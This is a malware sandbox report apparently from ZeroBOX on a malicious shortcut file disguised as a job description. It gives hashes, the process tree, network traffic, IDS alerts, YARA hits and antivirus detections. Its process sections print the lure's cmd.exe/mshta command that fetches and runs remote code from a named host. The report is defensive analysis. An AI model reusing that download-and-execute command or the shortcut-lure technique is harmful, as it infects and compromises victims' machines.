Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 29, 2021, 9:50 a.m.	Oct. 29, 2021, 9:54 a.m.

Size	209.1KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Thu May 13 03:13:51 2021, mtime=Mon Oct 11 20:50:50 2021, atime=Thu May 13 03:13:51 2021, length=289792, window=hide
MD5	`3c324706e3bae0b7187b134a813011cb`
SHA256	`38ed248501bd35cd140f8376ac42e2c5a46ed4ec71cff0cec290fbc93678f323`
CRC32	`C6CA27A7`
ssdeep	`6144:v+qXdu/Oj/y1zKxYNg/lnxFEMEZnAgqYWAyUCBJ:v+6d1jqV+nxkAqWAy1`
Yara	Generic_Malware_Zero - Generic Malware Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "JvxNWbC" "C:\Users\test22\AppData\Local\Temp\FiCas AG Job Description.lnk"
2452
- cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://note.onedocshare.com/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=
  2596
  - mshta.exe C:\Windows\System32\mshta https://note.onedocshare.com/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=
    2348

Name	Response	Post-Analysis Lookup
apps.identrust.com	CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 23.65.188.19 A 23.65.188.16	23.216.159.81
note.onedocshare.com	A 149.28.162.113	149.28.162.113

IP Address	Status	Action
149.28.162.113	Active	Moloch
164.124.101.2	Active	Moloch
23.65.188.19	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49176 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49171 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49176 149.28.162.113:443	None	None	None
TLSv1 192.168.56.103:49171 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=onedocshare.com	81:b5:79:98:5d:c2:83:1c:d0:dd:b4:eb:1e:1e:14:84:f5:bc:5f:43

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 29, 2021, 9:50 a.m.		1	1	0

Performs some HTTP requests (2 events)

request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET https://note.onedocshare.com/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\FiCas AG Job Description.lnk

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://note.onedocshare.com/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=
cmdline	C:\Windows\System32\mshta https://note.onedocshare.com/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 29, 2021, 9:50 a.m.	process_identifier: 2348 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 29, 2021, 9:50 a.m.	flags: 15 family: 0		111	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://note.onedocshare.com/seZlG2VYJ6l05Yn4tvYj93t9eK3OX72pIMiW95JlhDY=

Yara rule detected in process memory (39 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 29, 2021, 9:50 a.m.	key_handle: 0x000002c0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2452 resumed a thread in remote process 2596
Process injection	Process 2596 resumed a thread in remote process 2348
NtResumeThread Oct. 29, 2021, 9:50 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2596	1	0	0
NtResumeThread Oct. 29, 2021, 9:50 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2348	1	0	0

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

CAT-QuickHeal	LNK.Agent.41324
ALYac	Heur.BZC.YAX.Nioc.1.078B6D01
Sangfor	Trojan.Generic-LNK.Save.6890a73b
Arcabit	Heur.BZC.YAX.Nioc.1.078B6D01
ESET-NOD32	LNK/Agent.GX
BitDefender	Heur.BZC.YAX.Nioc.1.078B6D01
MicroWorld-eScan	Heur.BZC.YAX.Nioc.1.078B6D01
Tencent	Heur:Trojan.Winlnk.Downloader.wya
Ad-Aware	Heur.BZC.YAX.Nioc.1.078B6D01
Sophos	Troj/DownLnk-X
DrWeb	LNK.Downloader.207
FireEye	Heur.BZC.YAX.Nioc.1.078B6D01
Emsisoft	Heur.BZC.YAX.Nioc.1.078B6D01 (B)
GData	Heur.BZC.YAX.Nioc.1.078B6D01
AhnLab-V3	LNK/Autorun.Gen
MAX	malware (ai score=82)
VBA32	Trojan.Link.Crafted
Zoner	Probably Heur.LNKScript
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)
SentinelOne	Static AI - Malicious LNK

FiCas AG Job Description.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All